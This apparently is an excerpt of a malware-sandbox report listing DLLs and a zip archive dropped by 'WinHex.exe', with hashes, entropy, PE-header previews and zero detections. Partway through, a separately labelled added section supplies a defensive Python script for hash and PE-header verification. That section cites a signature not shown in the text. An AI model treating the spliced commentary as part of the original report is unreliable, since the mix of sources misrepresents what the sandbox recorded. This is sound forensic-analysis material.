                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27136
                                                                                                                      Entropy (8bit):5.860087695934532
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:1FDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDvfgjVx2:HDLh98jjRe+1WT1aAeIfMzxH2mDDQj
                                                                                                                      MD5:967774EAA86427AE23F65D52E78A96C3
                                                                                                                      SHA1:564A44CDC439A2CB64A0CDF3026D8BED586814D0
                                                                                                                      SHA-256:C4777C6B76C57329CD0200760D3F2DED3AFBD8B0AEF38FB07560D78673FE17E0
                                                                                                                      SHA-512:98A7D2240E71D9EACBE791D8E34E68BD6E3FDE01A8E66B2DF79292779D077692A85C0702CADB3755833A7047F1E9DFC0707D3365BBFEF8E2B7BF5A517B041856
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):27136
                                                                                                                      Entropy (8bit):5.916771883983999
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXYElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXr+j
                                                                                                                      MD5:8B152AC4C651824C76DE4850C96DF5E0
                                                                                                                      SHA1:7405C46CEB3E4EA419B2BB759FE66BD056AE9D6F
                                                                                                                      SHA-256:2C2C60E30276CCFEE38A9BA22437E635D44C1905F55BEAEACAFBCEB22F82FDDA
                                                                                                                      SHA-512:4A6EFB526C916539DB2005100AE2F18941E7A72B040CB3B12C0BF575300CD341E8F54A5E82CAD10994863AD9733CE918635CB045A51DF7232913DBBD966D4158
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12800
                                                                                                                      Entropy (8bit):4.998403212213497
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:DzzRF/1nb2mhQtk4axusjfkgZhoYDQ6RjcqgQvEty:Dzzd2f64axnTTz5DLgQvEty
                                                                                                                      MD5:4F9B823A8854CC1F3DAD486A46DF9B58
                                                                                                                      SHA1:B3927E404C9E0F120B2E6701F6F22FC5A6823297
                                                                                                                      SHA-256:9051CA4727C10A1E17151F71765529B39E4BF0630A2D34BF5F3FC9FBFBEBD405
                                                                                                                      SHA-512:6B6B7975697AD25A99271B0CBB9D4A8D69FE7303A00582F4492F905221D237E4B38549C5FCEC2A12826AC0B7D417BA6CE1A1A10E52EBDA32C32D5F972F6548C4
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d......e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13312
                                                                                                                      Entropy (8bit):5.024430550992261
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:JF/1nb2mhQtks0iiNqdF4mtPjD0DA5APYcqgYvEL2x:V2f6fFA/4GjD+cgYvEL2x
                                                                                                                      MD5:AE9516E5F80B8DC52E828477B7A7FB88
                                                                                                                      SHA1:E823DAD90FA9B8F432060277B732452EE2AF3C0B
                                                                                                                      SHA-256:EBC0FEEFDE95F93B46181E2A019A0FC17B1E885868A9D2E175977036FFE97AAE
                                                                                                                      SHA-512:799C15F52772EF78422DE01B2B0A4615B5F31FAEDE804D982828ED1B7FAA1154DE4148E4FDE5C254D3C6F081B095401101E4AED18AA48B89B0D1B82C07FFD3BA
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d......e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):16384
                                                                                                                      Entropy (8bit):5.2349270489356945
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:QNTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDgXgvrjcqgCieT3WQ:YafgNpj9cHW3jqXeBRamDRZgCieT
                                                                                                                      MD5:BC69527B01F08D163BDC230D65B45389
                                                                                                                      SHA1:B94830EEDB4A973CDFF9E11A9291313F4CE782C8
                                                                                                                      SHA-256:E5BEE6060733AC03728FA633A86EE3A86B2B72E57FB32A7C11FADF1E695E0248
                                                                                                                      SHA-512:2867FC506540A03759E9D1BAA4788D40066CB40E1D7889AC4B12C7BC6851BE85A693E11549FEF436D73FD04E5377275FAF76446D93F71BA969709A5242D8B1C5
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15360
                                                                                                                      Entropy (8bit):5.132963036391655
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:AZNGXEgvUh43G6coX2SSwmPL4V7wTdDlIlaY2cqgWjvE:dVMhuGGF2L4STdDqkYWgWjvE
                                                                                                                      MD5:EF29B3A91BD396BC80798E604EC50A13
                                                                                                                      SHA1:9D3EE4CEBA0367C4D53E9EEE85BB2713DDCDFF57
                                                                                                                      SHA-256:E5047A9EFDFF2DED2E8D97E7851CDA4720DEC522A758C30BDF03E4A3D7BEB9FC
                                                                                                                      SHA-512:71C0BBDC5282ACA8FC4329DCCD702D0422607814D540C41D45390F4AE6203C9F87EF21B174DDBB1560A3EFFA30E09518FFD2F18A83AC2E5B6654D5389E33E808
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d......e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):35840
                                                                                                                      Entropy (8bit):5.927888759056423
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:DbEkzS7+k9rMUb8cOe9rs9ja+V/Mh8h56GS:DbEP779rMtcOCs0I/M2f
                                                                                                                      MD5:B85B60338399A82F0BF4EC0DB7F9D207
                                                                                                                      SHA1:2E35614994B0DA314FDD8ED1744AABA8C4A81865
                                                                                                                      SHA-256:95CC69008A6B8A3244CF54A4690407866C20F62EB05FA92F5D0739E07F46F8A4
                                                                                                                      SHA-512:E21FAC2E6C7EB2908052971EC71CA9A24D4C50914022E84464CE5CB1F4DFDB5DD0D7B73C65F9F05B02013AAB6FA262F63AC89EED414DA5416FD475F230219D1C
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12288
                                                                                                                      Entropy (8bit):4.798563348198137
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:xEkCfXASTMeAk4OepIXcADpYX6RcqgO5vE:xuJMcPepIXcAD863gO5vE
                                                                                                                      MD5:C6EA84586946A9782EFFA124F207F6CF
                                                                                                                      SHA1:C788A064A0C57EB67689212C674828FF357104D1
                                                                                                                      SHA-256:2651674583DE3CE95E5681E3BB8208A01A4138574C44094305BEEC3E7963D37F
                                                                                                                      SHA-512:6806B7D3D95ADEBB665A0C592DEDED2ADB5FEC9AD9B178D7A9EA04C0156E6B6B43388E92DB979432C09CCAF8237A4EF05E689399126ABB922383170DB8F22CA0
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d......e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):754688
                                                                                                                      Entropy (8bit):7.624959786813075
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:r1UrmZ9HoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6hS:JYmzHoxJFf1p34hcrn5Go9yQO6M
                                                                                                                      MD5:A22A44CBCCCB5D6658B4BC17CBB40387
                                                                                                                      SHA1:75427EB51C79EF969ECA74827CC63DC2C818BD12
                                                                                                                      SHA-256:D18CEFECD7DECFE8D777A0F44C8BD5F899C20930A1ECEADCA18F667EDCCD0C45
                                                                                                                      SHA-512:97E79D1634833B02150895439B8F592752BC91D7DD9F738D62A807F6CC77F8E76233481B3A780F65D6BF525F75AEA2E398E3FFC4FE2A7A14C7C743EDF6ACABD2
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&:..b[.Lb[.Lb[.Lk#sLd[.Lw$.M`[.L)#.Ma[.Lb[.LI[.Lw$.Mn[.Lw$.Mj[.Lw$.Ma[.LX..Mg[.LX..Mc[.LX..Lc[.LX..Mc[.LRichb[.L........................PE..d......e.........." ...%.n..........`.....................................................`..........................................p..d...tq..d...............0...............4...@Z...............................Y..@...............(............................text....l.......n.................. ..`.rdata...............r..............@..@.data................j..............@....pdata..0............r..............@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................
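The records above list, for every file the WinHex.exe process dropped, the fields an analyst needs to match an artifact recovered from disk against the report: size, 8-bit entropy, MD5/SHA1/SHA-256/SHA-512 and the libmagic-style file type. The `PE..d.` visible in each Preview is the COFF machine word 0x8664 (AMD64) in little-endian order, which is what makes them "x86-64". The following script is an added example, not part of the Joe Sandbox report or of the sample: it recomputes those fields for a file and reports which ones disagree with a record. The header-only PE image it builds for testing is a constructed input (not loadable, it only has a DOS stub, COFF and optional header), and the machine/subsystem tables cover only the values named in the comments.

```python
"""Recompute the dropped-file fields of a sandbox report and compare them
against a record.  Added example; the PE builder produces constructed test
input, not one of the DLLs listed in the report."""
import hashlib
import math
import struct

IMAGE_FILE_DLL = 0x2000            # Characteristics bit: image is a DLL
MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0xAA64: "Aarch64"}  # assumption: only these
SUBSYSTEMS = {2: "GUI", 3: "console"}                                    # assumption: only these


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests under the same keys the report uses."""
    algos = {"MD5": "md5", "SHA1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}
    return {k: hashlib.new(v, data).hexdigest().upper() for k, v in algos.items()}


def parse_pe(data: bytes):
    """Parse DOS header -> COFF header -> optional header and return the
    fields behind a 'PE32+ executable (DLL) (GUI) x86-64' description,
    or None if the blob is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine, _nsect, timestamp, _symptr, _nsym,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if fmt is None or opt_size < 70:
        return None
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]   # same offset in PE32 and PE32+
    is_dll = bool(characteristics & IMAGE_FILE_DLL)
    desc = "%s executable %s(%s) %s, for MS Windows" % (
        fmt, "(DLL) " if is_dll else "",
        SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem),
        MACHINES.get(machine, hex(machine)))
    return {"description": desc, "machine": machine, "is_dll": is_dll,
            "subsystem": subsystem, "timestamp": timestamp}


def describe_file(data: bytes) -> dict:
    """Build a record with the same field names as the report."""
    pe = parse_pe(data)
    rec = {"Size (bytes)": len(data),
           "Entropy (8bit)": shannon_entropy(data),
           "File Type": pe["description"] if pe else "data"}
    rec.update(file_hashes(data))
    return rec


def verify_against_record(data: bytes, record: dict) -> list:
    """Names of record fields whose value differs from what the bytes yield.
    Entropy is compared with a small tolerance; everything else exactly."""
    actual = describe_file(data)
    bad = []
    for field, expected in record.items():
        if field not in actual:
            continue
        got = actual[field]
        if field == "Entropy (8bit)":
            if abs(float(expected) - got) > 1e-6:
                bad.append(field)
        elif str(expected).upper() != str(got).upper():
            bad.append(field)
    return bad


def build_minimal_pe(machine=0x8664, is_dll=True, magic=0x20B, subsystem=2,
                     timestamp=0x65A1B2C3) -> bytes:
    """Constructed test input: a header-only PE image (not loadable)."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    characteristics = 0x0002 | (IMAGE_FILE_DLL if is_dll else 0)   # 0x0002 = EXECUTABLE_IMAGE
    opt_size = 240 if magic == 0x20B else 224
    coff = struct.pack("<HHIIIHH", machine, 1, timestamp, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    sample = build_minimal_pe()
    for k, v in describe_file(sample).items():
        print("%s:%s" % (k, v))
```

To check a real artifact, read the file in binary mode and pass its bytes to `verify_against_record` together with the fields copied from the record (for instance `{"SHA-256": "D18CEFEC...", "Size (bytes)": 754688}`); an empty list means the file on disk is the one the report describes. `parse_pe` also returns the COFF `timestamp`, which is the value behind the "Binary contains a suspicious time stamp" signature and can be compared with the sample's compile-time claims.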

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):27648
Entropy (8bit):5.792403723686486
Encrypted:false
SSDEEP:384:oBwi/rOF26VZW1n0n/Is42g9qhrnW0mvPauYhz35sWJftjb1Ddsja15gkbQ0e1:qL/g28Ufsxg9GmvPauYLxtX1Dakf
MD5:6405600CF9AF7CE732E571A473DC4948
SHA1:7B886757450BE12E09DC5E3A5BBEE46FC6B8164B
SHA-256:ABE72CF86D7E888C7B2E216B55072FD85FEF0E6089A79A7532728EBFF7C558D1
SHA-512:897AF5EB04F3F7630F599C8169EBF13BE5365E80E8597BB16B28ACA5AD0C86EB19FA03E7C019631B62DB66D4D8005E63E83AD8FC414D7AEDFF2D5C82D715BA46
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):67072
Entropy (8bit):6.0603101427463635
Encrypted:false
SSDEEP:1536:sqctkGACFI5t35q2JbL0UbkrwwOoKXyMH1B7M9rMdccdWxRqpq:sqctkGACFI5t35q2JbgrwwOoqLTM9rMS
MD5:344F52CCC83A150A98E6B7121CF42C39
SHA1:CF8B3D886FBFEC5FB4C226AC1EC7F88E9DDDDC21
SHA-256:F50D64CECCEA8B2A2CD1320084DB5A14A3B21FB0539363D73403D546E32E931B
SHA-512:09A7EDF0FCCE080EEA7C5D69776A0E80A89946838F5C9632D4F5AB4C42D335406305C1001BFD2798D3C67ED6C33B6CAF2AB4FFD6737F948D2618EB3B1510A449
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):10752
Entropy (8bit):4.488398815773202
Encrypted:false
SSDEEP:96:+pVVdJvbrqTu6ZdpvY0IluLfcC75JiC4cs89EfqADzhDTAbcX6gn/7EC:0VddiT7pgTctdErDVDTicqgn/7
MD5:734F387058B9B727A5B62825DE18CDCF
SHA1:C643069D4F8D5AC84B4EC5201C65686E30FE85A4
SHA-256:A705262324FD61378EFF8CB8E56B48C8F9B049644C34701E3D7F96F8CB5061C0
SHA-512:F3077E9B075A83A512A50F4059E80DCCE8335EE6C491B2E8B653270EB8040069A314D84F944787BBAF2495FF4B8535217EA238672E7183D11D1E149C1C944FF0
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):10240
Entropy (8bit):4.730275068726559
Encrypted:false
SSDEEP:96:fJVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EVAElIijKDQGcbMZYJWJcX6gbW6s:7VddiT7pgTctEEaEDKDYMCWJcqgbW6
MD5:44A13910DA5086805BD11F4C459728CA
SHA1:0B403AD0684034644828CBC983B7AEE8D189C208
SHA-256:E1DD2583E46BC40E8E6D6ABCFCBB752C88610502AF3D4078FE5AFD3B18A9F964
SHA-512:4E381AFC2BD2978EEF3A395E78A6BB9E3C302D71BF392DBE3F7B2F43EDCAA0A963C91F2AB72BC602B39D1F75B281866F7F6971617D713F8610736CDD31FFC230
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):10240
Entropy (8bit):4.685487750004037
Encrypted:false
SSDEEP:96:ugZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DYWMoG4BcX6gbW6O:uuVddiT7pgTctEEO3DioHcqgbW6
MD5:DCAC334A352EF600574C52FDF30F96A1
SHA1:A3668AE8121981E3B173C250DE0FC8BD2066CF89
SHA-256:560A6D183CE437B847BFB7B7D4A98F22EA72FB365FBC2EC73DDD1BD8BE1C6E4D
SHA-512:6CDAAEEF78E29D4292EE475D50D8187F6754AD99250EF9732F2EA2439941AF5FD05DB4EC6D88FA1B9BA8420CE9700AA2EB5412D7B28196107D5F126CD7F2E440
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):94088
Entropy (8bit):6.4315064777018955
Encrypted:false
SSDEEP:1536:bS6NH9M7vShoxXqYGZLAy10i5XNS83NT/sM9MYDiRecbbVKKoB98:bFRmxXqX0yvX7mHYWRecbb8l
MD5:7942BE5474A095F673582997AE3054F1
SHA1:E982F6EBC74D31153BA9738741A7EEC03A9FA5E8
SHA-256:8EE6B49830436FF3BEC9BA89213395427B5535813930489F118721FD3D2D942C
SHA-512:49FBC9D441362B65A8D78B73D4FDCF988F22D38A35A36A233FCD54E99E95E29B804BE7EABE2B174188C7860EBB34F701E13ED216F954886A285BED7127619039
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):87608
Entropy (8bit):6.406217429501724
Encrypted:false
SSDEEP:1536:m9txcZQWVujgkdI0Ls7PacKYyTFQ+DM9D8VXBPpt3nl7+xIX4VfybUfA:MvkQAFis7acHyTFNDM6VXBPpt3oxIX4I
MD5:6FD0281BCA7EEE0F354A91F958714EDB
SHA1:C7F643955D589F6D3093459327DCAAB3B7AE4A32
SHA-256:03D8966F4D8AB347140A3AD9938FB91DB11E01E028E980721451070EB0483CF7
SHA-512:86B2944ACAC0601273A7534B5698991ED0475CC3F913F179FAD27AA8CB7732EA56D9E70B6E959FB55795384ED652565586B8A10474864DAA4874321F31B4A416
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):127032
Entropy (8bit):5.929945996813773
Encrypted:false
SSDEEP:3072:nf738EmBkP4rwNngxk6GWewujpufeTxJIphtNIXVP8n:nr0W4sWk6xdfeTzI5Hn
MD5:DA2FF1686AB85C37A2A247BB8595C258
SHA1:2168B91CD87F89F9A5590775BD6610EABC5D4CB7
SHA-256:279560B61E20B869A059A103FB010093F9E367420BC81182646E357DE8B9740F
SHA-512:7711CB3A8302AF491BE5A33923032BE4633400EE5C5D65937307F8C5E14674F0F32C96569E77FE894728A9F4DBA1FBC43A984E8BD262721B0F8949D8F7BB93F3
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):47672
Entropy (8bit):5.989015440500447
Encrypted:false
SSDEEP:768:ombGJMgxzB7992zIyYsw3jY2rV4h6lievW4SJIXsI7mDG4yYBUf2h:omaJxxVMn0cs4mfv4JIXsI7yy+Uf
MD5:3400DA54FAF3C3128F9C9E126A881BE0
SHA1:6352074113ECB5B5ECF0442D70898F2ACB933E91
SHA-256:68913D6D5102D32DDDF5A21A4770AC2791F29106C0D2D3A3D0192356EA366C66
SHA-512:D9D9CA6A27792AF60E36FAB9D623BCDD9727EFD565CD8C3787DA70F10E168DED90D9208F9C9C56A5815AB316779DC05DC799FBF8E327C9EF18765C6C529886C4
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):163896
Entropy (8bit):6.761466336533283
Encrypted:false
SSDEEP:3072:w4V6lmD0H/D/D55QufWicmvCcr6ayP4znfY9mNoBnCsYIXznxIXH1bi:w4V6lmD0fD/bBym2ZmgYOB0IDn4i
MD5:0CAA4DA7B74FC8E8F08BA736274BDB46
SHA1:4B46DC22C81FA3558537249C994614DEF1FD8CCE
SHA-256:167C5550B93541C703C8AFEB4D912719D5039230A7EFCE8F4BC500F175252ED8
SHA-512:47F1F338EA4055A4B88691EBB511EE95D29943AA7D519A7D5F513BEF26641990C1F31AD2839E7ED0342A5A262255B770CA922F7D173C998E0FF11C594BF8EFAB
Malicious:false

Process:C:\Users\user\AppData\WinHex.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):79928
Entropy (8bit):6.1131945752612955
Encrypted:false
SSDEEP:1536:UysqI4cNSk1ZyCvebpgA1l9/s+7+p6txRjDouj7NIXVwbyKUf7:DsqI4M92KA1l9/se+p6xRPoM7NIXVwA
MD5:49F417DE4AAAE069D5B2D5D5A4DDABE1
SHA1:56772FE3D3A7F7865D412E3B27C11EC7E7C9E3C1
SHA-256:F1930CA4C78029FB41F3F661194B9D3001D0A99F45D68BF3A4A87D9EA36AAD20
SHA-512:83F5BE813CB8C0D738DBC27AB45AC561AA0DFE65C5CAF72F47A72E3AFA05E7E750AC63CF9A42A983A86CE33B25BB1426E0B2E78D62598616FD040B72C34419F4
Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):155192
                                                                                                                      Entropy (8bit):5.907666632454038
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:TFGRolFoltLCzqjPPwedc54KyQ004OazdstGnBYi5qRW46ayfxIX47:hLKt+zqjww8yQlazdkW46a2
                                                                                                                      MD5:4DDF64B25544D11A28215052A394B457
                                                                                                                      SHA1:8C9D674F5CD29BA44FC6F525A184CBB7934FE006
                                                                                                                      SHA-256:B673E41306D6DF496151017ECB153A69E0BE509B448697D70427AC82C1664974
                                                                                                                      SHA-512:231BBE17BF1E5BF0173E396EA3703F93A48404A08EB6665F1F20C3D107B7370859FFF2B5EC5F2515A47F7541BA3426EACA624EE1E13B1BF9DA38EDC3177DEA7A
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\AppData\WinHex.exe
                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1031497
                                                                                                                      Entropy (8bit):5.502190327886212
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:fhidbLtosQNRs54PK4IMeVw59bfCEzX87EE42YR32DA:fhidbLtosQNRs54PK4IS9k7Ed2KKA
                                                                                                                      MD5:5BA5437734D814562E982F736DE3EEC8
                                                                                                                      SHA1:9E354A7C3C4562925203C29853E4D716A1D7AF7C
                                                                                                                      SHA-256:AE725DFCF77CA5E40CFE8B87453305F735ECE6E76494CE22A89A0C10FEEC4886
